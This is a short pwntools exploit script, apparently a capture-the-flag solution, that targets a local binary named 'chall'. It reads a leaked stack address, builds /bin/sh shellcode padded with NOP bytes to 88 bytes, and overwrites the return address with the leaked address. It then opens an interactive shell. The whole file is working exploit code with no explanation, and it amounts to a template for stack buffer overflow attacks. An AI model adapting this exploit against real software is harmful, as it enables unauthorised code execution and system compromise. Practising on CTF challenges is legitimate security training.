#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./chall", checksec=False)
r = process()

# funcs
s = lambda a: r.sendline(a)

# leak
r.recvuntil(b": ")
stack_addr = int(r.recvline(), 16)
log.info("stack_addr: %#x", stack_addr)

# buf
sc = asm(shellcraft.sh())
sc += b"\x90"*(88-len(sc))
buf = sc
buf += p64(stack_addr)
s(buf)

r.interactive()